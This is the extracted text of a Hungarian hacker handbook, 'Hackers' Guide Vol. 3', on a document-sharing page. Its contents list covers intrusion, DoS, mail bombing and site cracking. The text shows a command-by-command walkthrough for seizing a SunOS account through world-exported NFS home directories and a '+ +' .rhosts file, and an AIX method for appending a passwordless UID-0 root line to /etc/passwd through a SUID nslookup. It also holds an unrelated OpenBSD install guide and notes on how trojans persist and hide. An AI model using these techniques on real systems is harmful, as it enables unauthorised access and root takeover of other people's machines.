Informatika | Informatikai biztonság » Phantom - Hackers Guide Vol 3

Alapadatok

Év, oldalszám:2006, 124 oldal

Nyelv:magyar

Letöltések száma:772

Feltöltve:2010. május 09.

Méret:465 KB

Intézmény:
-

Megjegyzés:

Csatolmány:-

Letöltés PDF-ben:Kérlek jelentkezz be!



Értékelések

11111 dudli 2011. február 23.
  Jó.

Tartalmi kivonat

Hackers’ Guide by Phant0m Volume #3 Hackers’ Guide Tartalom: Volume #1 Előszó . Történet . Hacker-ek, cracker-ek, phreak-ek Billentyűs betolakodók Alternatív kultúra: Hackerek Hackerek A törés művészete Mi az igazság Kevin D. Mitnick, a CyberKalóz Hacker találkozó Hollandiában A hacker kiáltványa Hacker-etika Fontosabb időpontok az Internet fejlődésében Hálózattörténelem A Byte magazin 98/4 -es számában megjelent cikke Kezdés . A Hacker és társai Első lépések Ismertetô a hackelésrôl laikusoknak Kik a hackerek Mi is a cracker? Hogyan tevékenykedj illegálisan de biztonságban Hogyan lesz az emberből Hacker Használjatok PGP-t A titkosításról A paranoiáról Hack Windows alól és tudnivalók Az IP szerzés módszerei Social Engineering (társadalommérnökség) Trashing or dumpster diving (kukabúvárkodás) Backdoors Mi is az a trojai program Pár szó a trojai programokról Snifferek Keyloggerekről általában Mi az IP, TCP/IP A

WORLD WIDE WEB File Transfer Protocoll (FTP) GOPHER MI A TELNET Socks4 Protokoll Betörések felfedezése és kezelése I. Betörések felfedezése és kezelése II. Betörések felfedezése és kezelése III. Betörések felfedezése és kezelése IV. Betörések felfedezése és kezelése V. 2 Hackers’ Guide Betörések felfedezése és kezelése VI. Anonimitás . Névtelenség .avagy "Mindenki minket figyel!" Hogyan maradjunk ismeretlenek? Egyedi azonosító? Proxy I. Proxy II. Proxy Hunter leírás Password . A jelszavakról általában A linux passwd file felépítése Jelszófeltörés Jelszavak törése Jelszótörés Passwd Re: Passwd PWL Hacking Tutorial Password fileok keresése Hogyan válasszunk rossz jelszót CuteFTP bizonytalan jelszótárolása BIOS Hátsóajtók BIOS jelszavak feltörése Denial of Service (DoS) . Hogyan "lőjjünk" ki másokat a netről? És lőn sötétség a click után. A +++ath0 avagy a modemblitz NewTear DoS Tamadasok

fajtai Internetto chat szivatás NUKING IS LAMEEE. Win98 TCP/IP bug D.oS-ra alkalmas bug a W2000-ben Pirch98 ident/fserve daemon DoS támadás War FTP DoS (MKD/CWD) Email . Fake Email Hogyan küldjünk álcázott leveleket? (fakemail) Spoofed mail bombing by ReWtEr Levélbomba "Végtelenített" E-MAIL A legegyszerubb módszer levélbombázáshoz A Freemailrol ugy altalaban Szex kepek e-mailre Levélbomba törlése Outlook Express levelek Outlook Express 5 bug 3 Hackers’ Guide WinPopup és NetSend üzenetek álcázása Volume #2 Linux . Alap hack modszerek teoretikai oldala. Linux workstation törés Linux szerver törés Linux törés Egy lehetséges támadásra példa Backdoorokról gyakorlatban Unix Rendszerek Biztonsági Lyukai Root jog szerezése, ha alap felhasználo vagy Linux szerverek biztonsági kérdései Unix parancsok, amelyeket ismerned kell IP Chains kiegészítés Linux ipchains Firewall hiba Fakeuser Exploitok és a Telnet FTPCOVERSION bug Kernel bug

WuFtpd trükk PING -R : kernel panic Hálozati Programozás C nyelven SAINT Windows . Back Orifice NetBus 1.70 Leírás Trójai programok felderítése WIN95/98 alatt I. Trójai programok felderítése WIN95/98 alatt II. Trójai programok felderítése WIN95/98 alatt III. Szempontok Windows trojan készítéséhez Kevésbé ismert Windows9x biztonsági lyukak Jelszó eltüntetése Windowsrol Registryben tárolt jelszavakról Windows ScreenSaver Jelszó NT Password Cracker Windows NT munkaállomás törése Windows NT szerver törése Windows NT bug Re: Windows NT bug Hogyan fagyasszunk Win-es gépet intraneten Windows nyomtatómegosztás - bug Hogyan szerezzünk IP-t OP jog nélkül IIS 4.0 Microsoft Server Remote Exploit NT támadás FrontPage bug Minden az UNICODE bug-ról Internet Explorer tartalmi tanácsadó kikapcsolása 4 Hackers’ Guide Riched20.dll ActiveX I. ActiveX II. Novell . Novell jelszavak a Windows alatt Novell LAN Hacking Novell érdekességek Novell Groupwise

bug IRC, ICQ . Két tűz mögött RFC-1459 A mi mIRC-ünk. I rész: Popups A mi mIRC-ünk. II rész: Aliases A mi mIRC-ünk. III rész: Remote A mi mIRC-ünk. IV rész: Sockets A mi mIRC-ünk. V rész: Dialogs A mi mIRC-ünk. VI rész: Ami az eddigiekbôl kimaradt Az IRC-harc alapjairól IRC Hacking Tutorial A null csatorna A #2,000 bug User klónozás Fake OP Fakedrop Flood mIRC flood védelem mIRC jelszó kikapcsolása mIRC 5.4 Kill mIRCkill patch Hogyan juss be egy csatira vagy szerverre, ha bannoltak? Az "eredeti név"-ben vezérlôjelek használata Az Eggdrop IRC bot Eggdrop 1.326 bug CTCP trükk DCC gyorsítás Hogyan tevékenykedj (írj, csatlakozz csatira, stb.) más nevében? Hogyan rejtsem el az IP címemet IRC-n? WAC - WoRsITE A CoToCoP Advanced On-JOIN scanner Miért ne irceljünk root-ként Hogyan pusztítsunk IRC-n vagy ICQ-n ICQ exploit - avagy hogyan klonozzunk ICQ-ban ICQ Re: ICQ99 jelszavak CTCP-FAQ Web . A site feltörés 5 Hackers’ Guide Web-Hack

F.AQ Félhivatalos Web-Hack FAQ A PHF MODSZER Hogy kell Unix ACCot szerezni 24 oraval ezen dokumentum olvasasa utan ?? Mi a .cgi .cgi Egyszeruen A test-cgi sebezhetősége bizonyos beállításoknál Néhány CGI bug csak röviden Két .cgi exploit "Vadász Gábor OnLine" jelszavak Jelszóvédett weblapok feltörése Webes levelbomba kuldes [ fLip! ] Altavista.Com avagy a hackerek legjobb buntársa Webterminál hackelések Extra hack Re: Extra hack Hogyan hackeljük meg az Extra.Hu-t Emil.alarmixorg hack A /wwwadmin.pl Exploitról Account Manager Password Exploit (amadmin.pl) Apexec.pl Bug Campas exploit Carbo.dll exploit Exploit a Microsoft IIS-hez HTML kód, ami leöli az IE 5-öt MailMachine.cgi bug QuikStore Shopping Cart Script bug Sambar Server bug Sambar Server search CGI bug Subscribe Me Exploit (subscribe.pl) Unstorekeeper.pl Bug .asp fájlok forráskódjának megtekintése Phreak . Kálváriám a Matávval: avagy ügyintézés RULEZ!!!! A 909 használata Mi az a

wardialer Wardialer 1.31 by MMan THC-Scan használat + config Híváskorlátozásfeltörő 0.01 by Mman Ophacker 0.1 by MMan "06-80"-on keresztül külföldre A pénzbedobós telefonok hackolása Amerikában és Angliában Mobildolgok SMS Flood www.777smshu-n keresztül Szivatás mobiltelefonon keresztül Egy Matávos levele Volume #3 6 Hackers’ Guide Egyéb . Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs? Hogyan irjunk at barmilyen filet AIX rendszerben 0-as UID nelkul ? OpenBSD felhasználói útmutató Különböző trójai programfajták leírása me$$iah trojai program RSCs Offline Server Emulator AMaViS root exploit CD-k másolásvédelmének megszüntetése amstel.interwarehu feltörése Nyugatmagyarországi Egyetem feltörése Országos Széchenyi Könyvtár feltörése Függelék . Internet kisszótár Linux Kisszótár IRC szótár Phreak szótár Szabványos portok listája Nemzetközi domain-ek A legismertebb trojai programok és portjaik I. A

legismertebb trojai programok és portjaik II. BUHERÁTOR TESZT 1.1 BugTraq lista részletek. Hasznos URL-ek gyüjteménye a számítógépes biztonság területén Egyéb Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs serverre , felteve ha megfeleloek az adottsagok? Feltetel : Linux server , ahol lehetoleg root vagy , RPC program a celszerveren. mysite:~>/usr/sbin/showmount -e victim.sitecom Ezzel a parancssorral kiirja a celszerveren levo export konyvtarakat , es 7 Hackers’ Guide megmutatja ki altal lathato ez. Ha (everyone) akkor makod van Ha viszont a parancssor beirasa utan ezt irja ki : RPC: Program not registered. Akkor ezzel a programmal ne probalkozz , igy nem tudsz ide bejutni :). Szoval mi is tortenik , ha megvannak a feltetelek: mysite:~>/usr/sbin/showmount -e victim1.sitecom /usr victim2.sitecom /home (everyone) ->a /home konyvtarat barki lathatja:) /cdrom (everyone) mysite:~>mkdir /tmp/mount mysite:~>/bin/mount -nt nfs

victim1.sitecom:/home /tmp/mount/ ->be kell mountolni a konyvtarat mysite:~>ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1 drwxr-xr-x 19 root root 1 drwxr-xr-x 3 at1 users 1 dr-xr-xr-x 8 ftp wheel 1 drwxrx-r-x 3 john 100 1 drwxrx-r-x 3 139 100 1 -rw------- 1 root root 1 drwx------ 3 test 100 1 drwx------ 15 102 100 1024 Jul 4 20:34 ./ 1024 Oct 8 13:42 ./ 1024 Jun 22 19:18 at1/ 1024 Jul 12 14:20 ftp/ 1024 Jul 6 13:42 john/ 1024 Sep 15 12:24 paul/ 242 Mar 9 1997 sudoers 1024 Oct 8 21:05 test/ 1024 Oct 20 18:57 rapper/ Megjegyezendo , hogy mountolni altalaban csak root jogokkal lehet! Tehat : mysite:~>id uid=0 euid=0 mysite:~>whoami root mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd Mit is csinaltunk most? -> Az ls -sal paranccsal megelestuk a /tmp/mount konyvtarunkban levo bemountolt home konyvtarban levo dolgokat. Itt talaltunk egy rapper usert , akinek 102 az uid-je. Ezek utan hozzafuzunk egy sort a passwd file-unkhoz /ROOT

JOG!!/ amibe behelyezzuk a user nevet es a uid-jet. mysite:~>su - rapper Welcome to rappers user. -> Ezek utan siman su paranccsal belephetunk az aldozat user nevere. 8 Hackers’ Guide mysite:~>echo "+ +" > rapper/.rhosts -> Letrehozunk egy .rhosts nevu filet,amihez hozzarakunk 2 + +/az rloginhoz szukseges/ mysite:~>cd / mysite:~>rlogin victim1.sitecom Welcome to Victim.SiteCom SunOs ver.(crap) victim1:~$ -> rloginnal szepen belepunk :) Ezek utan kovetkezik a Root meghackelese :) , amit most meg nem irom le , mert meg nekem sem volt alkalmam kiprobalni. De a fent emlitett dolgok mukodnek. Jo szorakozast! Woodoo E-mail:hackwood@freemail.c3hu * Hogyan irjunk at barmilyen filet AIX rendszerben 0-as UID nelkul ? Az AIX rendszer install utan az /usr/bin/nslookup rootos SUID-al fut, hogy miert, azt senki sem tudja ;-) A 4.x-es rendszernel ez biztos igy van, a tobbinel nem tudom, mas verzioju AIX-al meg nem talalkoztam. Ha egyeb UNIXos rendszeren is

SUID-al fut az nslookup, akkor ott is mukodik. Nos, hogyan hasznaljuk ki, hogy SUID-al fut? Pofon egyszeruen. $ nslookup : hello vilag! >/etc/passwd Na ez nem jo moka, mert felul irjuk az /etc/passwd -t. ellenben: : rootocska::0:0:hehe:/root:/bin/sh >>/etc/passwd igy nem felulirjuk, hanem appendaljuk. Ha egy filet ilyen modszerrel hozunk letre ill. appendalunk, akkor az nslookup el kezd valamit pofazni, de erre ne figyelj oda, nem erdekes, mar megcsinalta a filet. FIGYELEM !!! Elmeletileg ez igy mukodne is, de nekem a 4.21-es AIX-nal (meg 9 Hackers’ Guide lehet, hogy mas rendszernel is) ha olyan filet irok felul ill. appendalok amihez eredetileg nem lenne jogom, akkor az eredeti szoveg helyett valami hiba uzenet (is) bekerul a fileba. Tehat mielott kiprobalnad gyozodj meg rola, hogy minden rendben mukodik, mert a passwd file elbaszasa sulyos karokat okoz a rendszerben. Akinek meg direkt ez a celja, az szegyelje magat ! -=[Ubul]=- * OpenBSD felhasználói útmutató

Bevezető Az OpenBSD a 4.3BSD NET/2-n és a 44BSD-Lite-on alapuló NetBSD 11-ből vált külön fejlesztési irányzattá. A 23-as verziótól már 44BSD-Lite2-re épül A rendszer fejlesztésének során nagyon komoly hangsúlyt helyeztek annak biztonságára. Minden kritikus rész külön tesztelve lett a fejlesztők által, akik között komoly biztonsági szakemberek is vannak, így a kód nagy része sorról-sorra auditált. Ezt a filozófiát követve a disztribúcióban megtalálható jó néhány hálózatbiztonsági és kriptográfiai program is, a jelszavak elkódolása blowfish algoritmussal történik, szemben az általánosan használt DES-sel és még sorolhatnánk. A rendszer kitűnően dokumentált. Rövid, tömör, érthető stílusban íródott man-ok és FAQ-k segítik a felhasználót, ezekben szinte minden információt megtalálunk. A dokumentációban és a manual-okban mindenütt kitérnek a biztonsági kérdésekre. Az olvashatóság érdekében az utasítások

fix szélességű-ek, az egyéb billentyűzetről bevitt szöveg pedig félkövér. 1. Hardver Napjainkban szinte teljesen elmosódik a határ szerver és kliens között, a forgalomban lévő hardver tekintetében. Sőt! Amíg nem sokkal ezelőtt még a szerverek igényelték a nagyobb kapacitást, teljesítményt a hardvertől és a kliensek kevesebbet, ez az arány eltolódni látszik a kliensek felé. A hardverelemek megbízhatóságának kérdésében azonban nincs változás. Ha szervert akarunk építeni, nagyon fontos, hogy jó minőségű alkatrészekből tegyük. Ez persze drágább, de ne feledjük, hogy nem lehetünk mindig a gép mellett, mint ahogy egy munkaállomás esetén ezt megtehetjük. Ezért ne sajnáljuk a pénzt paritásos vagy még inkább ECC RAM, SCSI merevlemez, márkás alaplap, PCI-os, megbízható hálózati csatoló (pl. SMC, Intel ne csak valami NE2000 kompatibilis vacak; a 3com nem igazán jó választás, de vigyázzunk a Tulip kártyákkal is), jó

minőségű ház és 10 Hackers’ Guide tápegység beszerzésére. Az így elköltött pénz egy részét visszanyerhetjük a videokártyán és az egyéb perifériákon (egér, billentyűzet, monitor). Ezekből ugyanis elég az olcsóbb minőség, monitorra és egérre pedig egy szerver működése közben általában nincs szükség. A támogatott hardverek listáját az INSTALL[architektúra] file tartalmazza. 2. Első lépések 2.1 A disztribúcióról Az OpenBSD fejlesztése erősen "központosított", ahogy az a BSD-k családjában szokás. Ez igaz a kernelre és a köré épülő disztribúcióra is Ebből adódik, hogy nincsenek különféle disztribúciók, mint a Linux esetében. A legfrissebb disztribúció verziószáma 2.6, ezt 1999 decemberében adták ki Emellett létezik egy "fejlesztői" verzió, amit "snapshot"-nak hívnak. Ebbe kerülnek az új library-k, programok, stb, majd az előző kiadását követő kb. 6 hónap múlva

ebből lesz a következő disztribúció. Snapshot telepítésével akkor érdemes kísérletezni, ha már rendelkezünk bizonyos tapasztalatokkal az OpenBSD-vel kapcsolatban, bár az esetek nagy részében van annyira stabil és megbízható, mint a disztribúció maga. 2.2 A telepítő készlet beszerzése Ezt megtehetjük üzletben (vagy nem, mivel nem ismerek hazánkban olyan üzletet, ahol OpenBSD CD kapható lenne), megrendeléssel (erről a http://www.openbsdorg/ordershtml oldalon találunk információt) vagy valamely publikus FTP site-ról való letöltéssel. Az mirror site-ok listája elérhető a http://www.openbsdorg/ftphtml oldalon 2.3 Telepítés A továbbiakban a 2.6-os disztribúció i386-ra készült része kerül ismertetésre 2.31 A disztribúció tartalma INSTALL.i386: Segédlet a rendszer installálásához és a támogatott hardverek listája CKSUM, MD5: A cksum és az md5 program outputja, segítségükkel ellenőrizhető a file-ok sértetlensége. floppy26.fs:

Boot image - lemezről való boot-oláshoz az installáláskor bsd: A kernel. base26.targz: A rendszer működéséhez szükséges programok és shared lib-ek comp26.targz: C, C++ és FORTRAN fordító, linker, include file-ok, lib-ek és manjaik etc26targz: A rendszer működéséhez szükséges konfigurációs állományok game26.targz: Játékok és dokumentációjuk man26.targz: A "base" csomagban lévő programok man-jai misc26.targz: Rendszer dictionary-k, dokumentációk xbase26.targz: Az X működéséhez szükséges binárisok, lib-ek, header és konfigurációs file-ok. xshare26.targz: A közös file-ok különböző architektúrákon xfont26.targz: X fontok xserv26.targz: Az X szerverek xlink26.targz: Az X szerver beállításához szükséges csomag 2.32 Telepítés CD-ről Ha CD-nk boot-olható, a boot lemez készítését elkerülhetjük. Ellenkező esetben a 2.33 fejezetben leírt módon kell boot lemezt készítenünk 11 Hackers’ Guide A telepítés

folyamata egyszerű. A gép indítását követően a "boot>" prompt-nál üssünk egyszerűen Enter-t. Ha a prompt nem jelenik meg, annak valószínűleg lemez, CD vagy egyéb hardverhiba az oka. Ha minden rendben, várjuk meg a kernel betöltődését, ami a gép sebességétől függően általában 0.5 - 2 perc A folyamat vége felé kapunk néhány hibaüzenetet (nincs swap, stb.) Ezek nem kritikusak, ne foglalkozzunk velük, lépjünk tovább Enter-rel. Az install program megkérdezi, hogy installálni akarunk-e vagy upgradelni a jelenlegi OpenBSD disztribúciót gépünkön. Üssünk i-t, azaz installálni akarunk Most a használt terminál típusára vonatkozó kérdést kapunk, amire szintén elég csak Enter-t ütni. Ezután a program kilistázza az elérhető merevlemezek azonosítóját, majd rákérdez a cél azonosítójára. Ez IDE esetén általában "wd0" (a "wd" kód jelenti az IDE eszközt, a "0" pedig a sorszámát, azaz a

"wd0" az első IDE eszköz a gépben), SCSI-nál "sd0". Adjuk meg a megfelelőt A következő kérdés arra vonatkozik, hogy akarjuk-e a teljes lemezterületet az OpenBSD használatába adni. Válaszoljunk yes-szel Persze lehetséges az OpenBSD mellett más operációs rendszer használata is, de mi csak ezzel az esettel foglalkozunk, mivel szervereknél ez az általános. A partíciók beállítása következik. Az alapvető opciók: • a Új partíció létrehozása. Megadásakor szép sorban végigkérdezi, melyik partíció honnan kezdődjön, mekkora legyen és milyen könyvtár alá legyen mountolva a rendszerben, illetve még néhány más dolgot, amelyekre elég Enter-rel válaszolni. • d partíció azonosítója Partíció törlése. A partíció azonosítója az a karakter, amit a p parancs kiír. • p Kiírja a létező partíciókat és adataikat. Célszerű külön /, /tmp, /usr, /var és /home partíciókat létrehozni. Néhány szó a

partíciók azonosítóiról - a standard kiosztás: • a: nincs lefoglalva, általában a / • b: swap • c: lefoglalt, a partícionálatlan lemezterület azonosítója • d-: egyéb partíciók Ennek befejeztével egy w + Enter, majd egy q + Enter kiadása (ezzel elmentettük a beállításokat) után újra végigkérdezi, mely könyvtárak alá akarjuk mountolni a partíciókat. Ha előzőleg jól beállítottuk, üssünk csak Enter-t minden kérdésre Ekkor - ha több merevlemez van a gépben - rákérdez, akarjuk-e a többit is partícionálni. Ha igen, az előző folyamatot kell végigjátszani Ha nem, done és kész Mielőtt végleg továbblépne, még egyszer visszakérdez, jók-e a beállítások. Üssünk Enter-t, ha minden rendben. Eddig megvolnánk. Most kapunk egy figyelmeztetést, hogy a következő lépés minden meglévő adatot felülír. Akarjuk? Hát persze Enter és mehet 12 Hackers’ Guide Következik a hálózat beállítása. Ez a lépés

elhagyható, ha CD-ről installáljuk a rendszert és később akarjuk a beállítani. Válaszoljunk n-nel ebben az esetben, különben y-nal. Első kérdés: mi legyen a gép hostneve? Írjuk be (domain név nélkül), majd Enter. A következő kérdés a domain név. Töltsük ki ezt is Kapunk egy listát a hálózati interfészekről, majd a program megkérdezi, akarjuk-e az elsőt konfigurálni. Hát persze Az itt következő adatok kitöltése értelemszerű, most nem részletezzük. Ennek végeztével rákérdez, akarjuk-e a következő interfészt is beállítani (ha van ilyen)? Válaszoljunk igényeink szerint. Ha ez megvan, rákérdez a "default route"-ra. Ez általában a router IP címe Adjuk meg neki. Ezt követi a name szerver címe utáni érdeklődés. Válaszoljunk erre és a következő kérdésre is, ha szükséges. Ezzel vége a hálózati beállításoknak. A program még rákérdez, akarunk-e egyéb beállításokat eszközölni. Tegyük fel, hogy nem és

üssünk Enter-t Most még egyszer, utoljára kiírja a partíciók adatait, majd rákérdez a root jelszóra. Válasszunk valami nem túl triviálisat, amit azért nem felejtünk el és ismételjük meg. A rendszer felmásolása kezdődik a kérdéssel: honnan akarjuk? Válaszoljunk c-vel a CD-s telepítés kiválasztásához. Ha megtörtént, a program felsorolja az elérhető CDket Válasszuk ki azt, amelyikben a disztribúció CD lemeze van (több CD esetén), majd a "partíció ." kérdésére üssünk Enter-t Ezután a CD lemezen lévő file-rendszer típusát kell megadnunk, ami szinte mindig cd9660. Válasszuk ki ezt és adjuk meg a "mount point"-ot (a könyvtár, ahol a disztribúció file-jai találhatók). Általában csak Enter-t kell ütni Ha eddig minden sikerült, kapunk egy felsorolást, amelyből a nekünk szükséges/felesleges csomagokat kell kiválasztani. Ezt a csomag neve elé írt - jellel tehetjük, amennyiben nincs rá szükségünk, a + jel

a csomag neve előtt pedig kijelöli felmásolásra. Ha ezzel készen vagyunk, írjuk be: done. Ekkor a program rákérdez: Készen állunk a csomagok tartalmának felmásolására? Tegyük fel, hogy igen. és üssünk Enter-t Ezzel a másolás elkezdődik. Ennek befejeztével kapunk egy kérdést: "Akarunk más csomagokat is feltenni?" Most nem, tehát Enter a válasz. A következő teendőnk az időzóna beállítása. Válasszuk ki a nekünk megfelelőt Ezzel is megvolnánk, most kaptunk egy csomó adatot a merevlemezről. Örüljünk (Ha nem örülünk, azt jelenti, hogy elszúrtunk valamit :)) A kérdésre (Akarunk-e X-et használni?) válaszoljunk tetszésünk szerint. Ennyi volna. Ha most beírjuk: reboot, a gép újraindul és máris egy OpenBSD boldog rendszergazdái vagyunk. 2.33 Telepítés FTP szerverről Első lépés: boot lemez felírása (Vigyázzunk, a lemeznek 1.44MB-osnak kell lennie, különben nem fér rá az image!): • Más UN*X-on: dd if=floppy26.fs

of=/dev/fd0 bs=32k 13 Hackers’ Guide • DOS, Win3x, Win9x alatt: rawrite.exe • NT alatt: ntrw.exe Az így elkészült lemezről boot-olva már ugyanazt a folyamatot kell végigjátszani, mint a CD-s telepítésnél. A különbség csak annyi, hogy nem a CD-t adjuk meg a "honnan" kérdésre, hanem f-et ütünk, azaz FTP szerverről akarunk telepíteni. Ha így teszünk, megkérdezi majd a szerver címét és egy usernév+password párost a szerverre való bejelentkezéshez. A telepítés folyamata innen már megegyezik a CDs telepítéssel 2.4 A frissen telepített rendszer beállítása Újonnan telepített rendszerünk használatba vételét kezdjük az adduser utasítással és hozzunk létre egy nem privilégizált felhasználót, amelynek nevében a dolgozni fogunk. A rendszer ezt minden root-ként való bejelentkezéskor közli is velünk, biztonsági okokból. Az adduser program elég felhasználóbarát, minden adatra rákérdez, amit szükséges

megadnunk, ezzel is csökkentve a hibák elkövetésének esélyét. Ha ezzel megvagyunk, lépjünk is ki, majd jelentkezzünk be a létrehozott felhasználó nevében. Most már kiadhatjuk a man afterboot parancsot, amely részletes segítséget ad a rendszer további beállításához. 2.41 Az előre lefordított csomagok (package-ek) Ha a disztribúció könyvtárlistáját tanulmányozzuk, találunk egy "packages" nevű könyvtárat, benne a disztribúcióhoz előre lefordított programokkal. Ezeket a pkg add csomagnév paranccsal könnyedén feltehetjük a rendszerre. A telepített csomagok listáját a pkg info utasítás segítségével kérhetjük le. Ha el akarunk távolítani egy csomagot, használjuk a pkg delete csomagnév utasítást. 2.42 Port kollekció A CD-n vagy FTP szerveren bizonyára láttuk már a ports.targz file-t Ezt a /usr alatt kibontva kapunk egy ports/ könyvtárat, benne kategóriákba szervezve az OpenBSD alatt lefordítható programok

könyvtárlistájával. (A lista korántsem teljes, mivel a port kollekciót is csak emberek készítik. Ennek ellenére szinte minden fontosabb programot megtalálunk.) Az egyes programok könyvtárában található Makefile nevű állományról már lehet sejteni, hogy egy make install utasítás segítségével a kért program forrása letöltődik, majd lefordítódik. A sikeres fordítás után a binárisok a helyükre kerülnek (a fordítás szinte mindig sikeres) és a program bekerül a pkg adatbázisba (azaz a pkg * parancsok használhatók). Érdemes odafigyelni, ugyanis a konfigurációs állományok nem másolódnak be maguktól a */etc-be - ezt nekünk kell kézzel megtennünk, ugyanis az OpenBSD filozófiájának fontos eleme, hogy a rendszer nem teszi lehetővé az ész nélküli installálgatásokat, mivel ez szinte mindig a biztonság rovására megy. Ezt a filozófiát tükrözi a rendszer egész csomagkezelése is. Egy kezdő felhasználó könnyen hozhat erről

elhamarkodott ítéleteket, de nem feledjük: az OpenBSD szerver operációs rendszer - kliensként nem használható olyan könnyedséggel, mint a FreeBSD vagy a Linux és nem is támogatja a hardvereszközöknek azt a széles spektrumát, mint az említettek. Szerverként azonban teljesítmény és megbízhatóság tekintetében komolyan felveszi a versenyt mindkettővel, a biztonság terén pedig nem is összehasonlíthatók. 14 Hackers’ Guide 2.43 CVS (Concurrent Versions System) Biztosan találkoztunk már olyan problémákkal program vagy dokumentáció keszítés közben, amikor jó lett volna, ha a régi verzió(k) is rendelkezésünkre áll(nak), esetleg szükségünk lett volna Changelog-ra. A CVS erre lett kitalálva, de emellett még számtalan hasznos funkciót tartalmaz. Olyan sokat, hogy ebben a dokumentumban nem is lenne célszerű mindet leírni, így csak azokkal foglalkozunk, amelyekre szükségünk lehet rendszerünk további fejlesztése és karbantartása

során. Kezdjük talán a a port kollekció letöltésének példájával: cvs get ports Ugye milyen egyszerű? Csakhogy ez így nem fog működni, szükségünk van még két környezeti változó beállítására: setenv CVSROOT anoncvs@anoncvs.caopenbsdorg:/cvs Ezzel beállítottuk a CVS szervert, amiről le akarunk tölteni. setenv helyett írjunk export-ot, ha nem csh-t vagy tcsh-t használunk. A következő: setenv CVS RSH ssh Ez csak akkor szükséges, ha a rendszeren nincsenek az RPC szolgáltatások engedélyezve vagy nincs rsh-nk. Biztonsági okokból azonban mindig érdemes használni, mert így a forgalom kódolva lesz, ellentétben az rsh-val, ami minden adatot - még a jelszavakat is! - plain text-ben visz át. Ha ezt a két változót beállítottuk, az először leírt utasítás működni fog. Ha el akarjuk kerülni a környezeti változók definiálását vagy csak jobban szeretjük az egysoros megoldásokat, akkor: cvs -d $CVSROOT get ports A $CVSROOT helyére

értelemszerűen a CVSROOT változónál megadott értéket kell behelyettesíteni. Célszerű azonban a következő formában használni: cvs -q get -PA ports A "-q" paraméter rábeszéli a cvs-t, hogy csak a legfontosabb üzeneteket írja a képernyőre. Ha frissíteni akarjuk a port kollekciót, így érdemes: cvs up -PAd ports A CVS RSH és a CVSROOT változók értékét update esetén nem kell újra beállítani, azokat az értékeket fogja használni, amit a "get"-nél megadtunk. Ha ezt mégis felül akarjuk bírálni, a következő formában adjuk ki a parancsot: cvs up -d username@masik.szerver:/cvs -PAd ports Ezzel meg is volnánk. Annyit még érdemes megjegyezni, hogy az elérhető CVS szerverek listáját a http://www.openbsdorg/anoncvshtml címen találjuk 2.44 Kernel fordítás Nem kell megijedni. Nem valami mágikus dologról van szó Aki Linux alatt fordított már kernelt, tudja, hogy viszonylag egyszerű művelet. OpenBSD alatt véleményem

szerint még egyszerűbb, csak kövessük az útmutatást. Első lépés - a kernel forrás letöltése: cd /usr/src cvs get -PA sys (Ne felejtsük el beállítani a CVSROOT és a CVS RSH változókat sem.) Ez eltarthat egy ideig, attól függően, mekkora sávszélesség áll rendelkezésünkre a kiválasztott CVS szerverig. Ha ezzel megvagyunk, következik a 2. lépés - a kernel konfigurálása: cd sys/arch/i386/conf 15 Hackers’ Guide cp GENERIC SAJATKERNEL vi SAJATKERNEL Ezzel el is kezdtük szerkeszteni a saját kernel beállításunkat. A SAJATKERNEL file kommentjei, illetve a man options segítenek eligazodni. Nincs más teendőnk, mint az "options" sorok kikommentezése abban az esetben, ha nincs szükségünk rájuk. Ha végeztünk, mentsük el a file-t és lépjünk ki az editorból. 3. lépés - a beállítások érvényesítése: config SAJATKERNEL 4. lépés - fordítás: cd ./compile/SAJATKERNEL make clean; make depend; make Ez is el fog tartani egy

ideig, a processzor és a merevlemez sebességétől, illetve a rendelkezésünkre álló memória méretétől függően. Ha készen van, nincs más dolgunk, mint: mv /bsd /bsd.old cp bsd /bsd És indíthatjuk is újra a gépet, már az új kernelt fogja használni. Néhány esetben nincs ilyen egyszerű dolgunk, ritkán ugyan, de előfordulhat, hogy a megadott beállításokkal a kernel nem fordul le. Ha magunktól nem jövünk rá ennek okára, kérjük hozzáértő segítségét. Ha eléggé értünk hozzá, hogy meg tudjuk állapítani, nem valami triviális oka van a hibának, írhatunk az OpenBSD-tech listára segítségért, de előtte még ellenőrizzük, nem fordult-e már mással is elő a probléma nézzük meg az archívumot. A http://wwwopenbsdorg/mailhtml oldalon megtalálható minden információ a levelezési listákról. Copyright Srágli Attila (sragli@choraii.com), 1999 A dokumentum eredeti formájában szabadon, részletekben a szerző megjelölésével

terjeszthető. Köszönet Miskey Sándornak, javaslataiért és a kritikákért. * Különböző trójai programfajták leírása Távoli adminisztrációs trójaiprogramok: Ezek a programok most a legnépszerűbbek most. Ezeket általában arra használják, hogy hozzáférjenek mások rendszeréhez. A használatuk is rettentő egyszerű Csak az áldozatot rá kell bírni arra, hogy futtassa le a gépén a szerver részét a programnak és márus FULL elérést akpunnk a rendszeréhez. Lehet feltölteni, 16 Hackers’ Guide letölteni, a eltárolt jelszavakat megjeleníteni, az aktuális képernyőt lementeni, cd-ajtót nyitogatni =) . stb Vagyis mindent megtehetsz amit a felhasználó megtehet a gépével! Sok ember rossz szándékkal használja ezeket. Ők egyszerűen csak törölnek és törölnek. Ez utóbbi eléggé pancser dolog, és aki csak ere képes az komolyan vizsgáltassa meg magát egy lélekturkásszal! =( Sajnos elég sok trójai scanner van ami már felismeri

a programokat de mindíg jönnek ki újabbak és így mindíg a trojai programok vannak előnyben, 1 lépéssel szóval nem szabad jóhiszeműen megbízni az antivirus és egyéb programokban! Általánosságban elmondható, hogy szinte mindegyik trójai automatikusan elindul minden windows indításkor. Ez annyit tesz, hogy vagy a regisztrációs-adatbázisba fészkeli be magát (leggyakrabban), vagy a win.ini/systemini -be ír bele (kevéssé gyakrbban) vagy pedig a közvetlen fájl-ba írás technikáját alkalmazza. (Ez utóbbi a szerver becsempészésének egyik legjobb módja.) A legtöb ilyen program egy szimpla programnak néz ki (legtöbbször a windowssystem könyvtárban), és nem látszik, a Ctrl+Alt+Del menüben sem. De ha van egy profibb Task Info programunk ami meg tudja mutatni az épp futó ÖSSZES proramot ott ki lehet szúrni a nem odavalót. Persze ehhez is kell egy kis gyakorlat és hozzáértés, mert ugye nem árt ha nem a kernel32.dll-t vagy az explorerexe-t

